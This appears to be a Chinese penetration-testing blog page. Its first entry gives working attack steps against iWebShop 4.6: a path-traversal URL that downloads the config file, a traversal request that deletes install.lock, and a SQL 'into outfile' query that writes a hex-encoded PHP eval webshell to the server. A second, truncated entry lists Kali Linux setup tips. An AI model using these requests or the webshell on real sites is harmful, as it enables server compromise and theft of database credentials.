分类: [渗透测试]

iwebshop4.6 后台getshell

AnyFileDownload:http://192.168.3.56:8081/index.php?controller=tools&action=download&file=../../config/config.php

AnyFileDelect:http://192.168.3.56:8081/index.php?controller=tools&ction=backup_del&name=../../install/install.lock

BackManagerGetshell:Select 0x3C3F706870206576616C28245F504F53545B2761275D293B203F3E into outfile ‘Physics Path’;

How to know the Physics Path:We use an no access write path can know the path

kali安装一些软件

来自githubasus笔记本网卡硬件关闭执行命令: echo “options asus_nb_wmi wapf=4” | tee /etc/modprobe.d/asus_nb_wmi.conf 改更新源: 编辑 vim /etc/apt/sources.list 删除所有,添加以下两段 deb https://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib deb-src https://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib 更新系统命令:apt update && apt upgrade && apt dist-upgrade && apt autoremove root用户无声音: leafpad 编辑 /etc/default/pulseaudi ......